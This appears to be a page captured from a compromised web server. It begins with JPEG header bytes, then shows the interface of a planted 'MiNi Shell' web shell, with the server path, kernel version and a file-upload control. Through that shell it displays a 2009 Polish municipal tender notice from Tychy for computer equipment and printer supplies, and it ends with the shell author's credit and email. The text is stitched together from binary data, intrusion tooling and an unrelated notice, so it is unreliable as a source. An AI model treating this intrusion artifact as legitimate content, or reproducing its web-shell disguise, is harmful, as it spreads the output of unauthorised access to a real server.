JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090219/34426-N-2009.html

<p class="kh_header"><b>Tychy: Dostawa sprzętu komputerowego wraz z oprogramowaniem oraz materiałów
           eksploatacyjnych do drukarek</b><br>
<b>Numer ogłoszenia: 34426 - 2009; data zamieszczenia: 19.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka  Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego wraz z oprogramowaniem oraz materiałów
           eksploatacyjnych do drukarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa:

   a) sprzętu komputerowego wraz z oprogramowaniem:
1) Komputer PC wraz z Windows XP Prof. + MS Office 2007  + monitor LCD 21-22 [rozdzielczość 1680x1050], czas reakcji matrycy 2ms,jasność 300 cd/m2,zgodność z normą ISO13406-2, obudowa z zasilaczem ATX z PFC + wentylator 120mm, procesor x86 dwurdzeniowy o wydajności 2,0 Ghz na rdzeń + wentylator CPU o głośności <=22 dBA, płyta główna  wyposażona w złącza PCI, PCI-E, karta grafiki z pamięcią minimum 128 MB RAM, chłodzenie karty pasywne, złącze DVI - podłączenie do monitora przez DVI [ wymagany załączony odpowiedni kabel], pamięć operacyjna 3 GB RAM, dysk twardy 500 GB [5 GB dla DOS, pozostała część Windows], nagrywarka DVD-RW, karta sieciowa współpracująca z DOS, klawiatura, mysz optyczna, system operacyjny Windows XP Professional PL  SP3 + DOS PC-DOS lub ROM-DOS ver.7,MS Office 2007 ( word, excel ),parametry jak podano lub lepsze, wymagane jest aby monitory ekranowe posiadały certyfikat CE oraz spełniały wymogi określone w Rozporządzeniu Ministra Pracy i Polityki Socjalnej z dnia 1.12.1998r. ( Dz.U.98.148.973, z późniejszymi zmianami) - 1szt.
2) Komputer PC wraz z Windows XP Prof. + MS Office 2007  + monitor LCD 17 [rozdzielczość 1280x1024],zgodność z normą ISO13406-2,obudowa z zasilaczem ATX z PFC + wentylator 120 mm, procesor x86 o wydajności 2,0 Ghz + wentylator CPU o głośności <=22 dBA, płyta główna  wyposażona w złącza PCI, PCI-E, karta grafiki z pamięcią minimum 64 MB RAM, chłodzenie karty pasywne, pamięć operacyjna 1 GB RAM, dysk twardy 80 GB [ 5 GB dla DOSD, pozostała część Windows] , karta sieciowa współpracująca z DOS, klawiatura, mysz optyczna, system operacyjny Windows XP Professional PL  SP3 + DOS lub ROM-DOS ver. 7, office 2007 (word, excel), parametry jak podano lub lepsze, Wymagane jest aby monitory ekranowe posiadały certyfikat CE oraz spełniały wymogi określone w Rozporządzeniu Ministra Pracy i Polityki Socjalnej z dnia 1.12.1998r. 
( Dz.U.98.148.973, z późniejszymi zmianami) - 3szt.
3) Komputer PC wraz z Windows XP Prof. + MS Office 2007  + monitor LCD 17 [rozdzielczość 1280x1024], zgodność z normą ISO13406-2, obudowa z zasilaczem ATX z PFC + wentylator 120 mm, procesor x86 o wydajności 2,0 Ghz + wentylator CPU o głośności <=22 dBA, płyta główna  wyposażona w złącza PCI, PCI-E, karta grafiki z pamięcią minimum 64 MB RAM, chłodzenie karty pasywne, pamięć operacyjna 1 GB RAM, dysk twardy 80 GB , nagrywarka DVD-RW, klawiatura, mysz optyczna, system operacyjny Windows XP Professional PL  SP3, MS Office 2007 
( word, excel ), parametry jak podano lub lepsze, wymagane jest aby monitory ekranowe posiadały certyfikat CE oraz spełniały wymogi określone w Rozporządzeniu Ministra Pracy i Polityki Socjalnej z dnia 1.12.1998r. 
( Dz.U.98.148.973, z późniejszymi zmianami) -1szt.
4) drukarka igłowa, ilość igieł 9 szt., szerokość papieru (składanka) 3 - 15 cali, drukowanie kopii 10 szt., maksymalna długość wiersza 15 cali, emulacje Epson FX, maksymalna szybkość druku DRAFT większa niż 1000 zn/s, polskie znaki Latin 2 (codepage 852) [wymagane sprzętowe wspieranie polskich znaków], złącze zewnętrzne RS-232 Centronics, wymagana współpraca z DOS + Novell 5.0 SBS, drukarka do pracy ciągłej przez 8 h, kabel RS-232 o długości 5m - 2szt.
5) drukarka igłowa : ilość igieł 9 szt., szerokość papieru (składanka) 2,5 - 15 cali, drukowanie kopii 5 szt., maksymalna długość wiersza 15 cali, emulacje Epson FX, maksymalna szybkość druku DRAFT większa niż 420 zn/s, polskie znaki Mazowia, Latin 2 (codepage 852)[wymagane sprzętowe wspieranie polskich znaków], złącze zewnętrzne RS-232 Centronics, wymagana współpraca z DOS + Novell 5.0 SBS, drukarka do pracy przez 4-6 h, kabel RS-232 o długości 5m - 7szt. 
6) print server 3 x LPT 1 xRJ45, Interfejs: 1 x RJ-45 10/100Mbit/s, 3 x porty równoległe - podłączeni edo drukarek z pkt. 4 i 5,  wymagane obsługiwanie systemów operacyjnych: DOS, Novell 5.0 SBS [Bindery] - możliwość dodania kolejki drukowania oraz drukarek pod Novell 5.0, wymagane obsługiwane protokoły sieciowe IPX - 2szt. 

b) materiałów eksploatacyjnych do drukarek :
1) dysk cd-r 700 - 20szt.
2) dysk cd-rw700 - 20szt.
3) dysk dvd+r - 20szt.
4) dysk dvd+rw - 20szt.
5) tusz czarny do HP 920, HP 3820 42 ml - 20szt.
6) tusz kolorowy do HP 920, HP 3820 19 ml - 5szt.
7) toner do drukarki laserowej HP 1300N hp 13A - 30szt.
8) toner do drukarki laserowej HP 1320N (6000 stron) 49X - 25szt.
9) toner do urządzenia wielofunkcyjnego HP 3020 12A  - 2szt.
10) toner do drukarki HP 2015n,dn (6000 - 7000 stron) HP 53X 	- 4szt.
11) toner czarny do HP CMI 1312 MFP CB540A - 1szt.
12) toner żółty do HP CMI 1312 MFP CB54A - 1szt.
13) toner turkusowy do HP CMI 1312 MFP CB541A - 1szt.
14) toner purpurowy do HP CMI 1312 MFP CB543A - 1szt.
15) toner do HP 1150 24A  - 5szt.
16) toner do HP 1000 15A - szt.
17) taśma do drukarki OKI 3321 - 100szt.
18) taśma do drukarki OKI 4410 - 12szt.
19) taśma do drukarki z poz. 4 tabeli pierwszej dot. sprzętu - 80szt.
20) taśma do drukarki z poz. 5 tabeli pierwszej dot. sprzętu - 100szt.
21) sprężone powietrze 600 ml do czyszczenia sprzętu komputerowego - 20szt.

   
2.  Zakres zamówienia obejmuje również:
- dostawę sprzętu i materiałów eksploatacyjnych ww. własnym środkiem transportu do siedziby Zamawiającego w Tychach, przy ul. Filaretów 31 ( pokój Nr 9 )

- Szczegółowy termin oraz godziny dostawy sprzętu zostaną ustalone przez Starszego
      Specjalistę ds. Sieci Komputerowej -mgr inż. Krzysztof Klekot, tel. 227- 40-91 wew. 167 
      lub 169 po podpisaniu umowy z wybranym Dostawcą. 

- Odbiór przedmiotu zamówienia zostanie dokonany przez osobę jw. 
      Wykonanie przedmiotu umowy zostanie potwierdzone w formie protokołu odbioru
      podpisanego przez uprawnionych przedstawicieli obu stron.

- Systemy operacyjne oraz pakiety biurowe zostaną zainstalowane przez Dostawcę w dniu odbioru, celem sprawdzenia czy dostarczony sprzęt jest zgodny z wymogami podanymi przez Zamawiającego

- dokonywanie przez Dostawcę bezpłatnych napraw gwarancyjnych w miejscu instalacji 
     urządzeń oraz maksymalny okres reakcji serwisowej w okresie gwarancyjnym do 18 godzin 
     od momentu zgłoszenia przez Zamawiającego usterki 

- dla każdego dostarczonego sprzętu należy dołączyć indywidualną kartę gwarancyjną.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.20-1, 30.23.20.00-4, 30.21.30.00-5, 30.23.43.00-1, 30.23.44.00-2, 30.23.72.52-0, 30.19.21.13-6, 30.12.51.10-5, 30.19.23.20-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Informacja na temat wadium:    3 000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków:    
O zamówienie mogą ubiegać się Wykonawcy którzy spełniają warunki określone na podstawie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych ( Dz. U. z 2006 r., Nr 164,poz. 1163 , Nr 170, poz. 1217 i Nr 227 ,poz. 1658, z 2007 r. Nr 64, poz. 427 i Nr 82, poz. 560 oraz z 2008 r. Nr 171, poz. 1058),  tj.:  
   -  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy
nakładają obowiązek posiadania takich uprawnień ; 
       	
    - posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i
osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych
podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania
zamówienia; 
   -  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
   -  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
      art. 24 ust. 1 i 2 ustawy Pzp., 
       oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia.
                                
Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach lub dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:

Wykonawcy ubiegający się o zamówienie publiczne muszą złożyć oświadczenie, że spełniają warunki udziału w postępowaniu stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1÷ 4 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych ( Dz. U. z 2006 r., Nr 164, 
poz. 1163 , Nr 170, poz. 1217 i Nr 227, poz. 1658, z 2007 r. Nr 64, poz. 427 i Nr 82 ,poz. 560 oraz z 2008 r. Nr 171, poz. 1058 ),

- wzór druku oświadczenia stanowi załącznik do niniejszej specyfikacji,
( W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
  oświadczenie o spełnianiu warunków udziału w postępowaniu Wykonawcy składają łącznie)

  Ocena spełnienia ww. warunku zostanie dokonana zgodnie z formułą spełnia / nie spełnia.

A.  Sytuacja podmiotowa wykonawców, w tym wymogi dotyczące wpisu do 
     rejestru zawodowego lub handlowego:

          Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:    
               
  1. W celu potwierdzenia, że Wykonawcy posiadają uprawnienia do wykonywania określonej 
       działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz, że 
       nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo  
       zamówień publicznych, Wykonawcy zobowiązani są przedłożyć następujące dokumenty:  

  1)  aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do 
       ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
       lub zgłoszenia do ewidencji działalności gospodarcze - wystawiony  nie wcześniej 
       niż 6 miesięcy przed upływem terminu składania ofert ;    
   
 2)  aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego  
       oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
       potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat 
       oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , że uzyskał 
       przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
       wstrzymanie w całości wykonania decyzji właściwego organu- wystawionych nie wcześniej     
       niż 3 miesiące przed upływem terminu składania ofert ;

                -W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
       przedmiotowe dokumenty wymienione w punkcie 1) i 2) muszą być złożone dla każdego z nich.

2.  Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
     ( Dz. U. Nr 87, poz. 605, z późn. zm. ) w sprawie rodzajów dokumentów potwierdzających 
     spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich 
     może żądać Zamawiający od Wykonawcy:
1)  jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  
     Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1) i  2) - składa dokument lub 
     dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
     potwierdzające odpowiednio, że:  
     a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
     b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
          zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na 
          raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;  
2)  jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce 
     zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie XI A.1. p.pkt. 1) i 2),  
     zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem,     
     właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
     gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma 
     siedzibę lub miejsce zamieszkania. 

     Ocena spełnienia ww. wymagań zostanie dokonana zgodnie z formułą spełnia / nie spełnia.
B. Zdolność techniczna

    Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:
    W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz, że 
    dysponuje potencjałem technicznym do wykonania zamówienia,  
     Zamawiający wymaga, aby wykonawca wykazał, że:

1) w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia  
     publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał    
     z należytą starannością dostawy odpowiadające swoim rodzajem i wartością dostawom
     stanowiącym przedmiot zamówienia -należy wykazać co najmniej dwie dostawy sprzętu
     komputerowego wraz z jego instalacją zrealizowane w ramach odrębnych kontraktów, o
     wartości każdej z tych dostaw nie mniejszej  niż 80 000,00 zł (brutto) 


     Do oferty należy załączyć:

  -  wykaz wykonanych dostaw odpowiadających swoim rodzajem i wartością
     dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz
     daty i miejsca wykonania  -należy wykazać co najmniej d w i e dostawy sprzętu
     komputerowego wraz z jego instalacją zrealizowane w ramach odrębnych kontraktów, 
     o wartości każdej z tych dostaw nie mniejszej  niż 80 000,00 zł (brutto) oraz załączyć
      dokumenty potwierdzające, że roboty te zostały wykonane należycie.

       Wykaz wykonanych dostaw o charakterze podobnym do przedmiotu zamówienia należy 
       sporządzić wg wzoru druku stanowiącego załącznik do SIWZ. 
    - W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać 
       łącznie lub co najmniej jeden z Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego -pok. 20 - cena 15 zł (brutto). Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście lub złożą wniosek o jej
przekazanie za zaliczeniem pocztowym..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2009 godzina 11:00, miejsce: Miejsce składania ofert: Miejski Zarząd Budynków Mieszkalnych w Tychach, 
          ul. Filaretów 31 -   SEKRETARIAT - pokój nr 15,.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com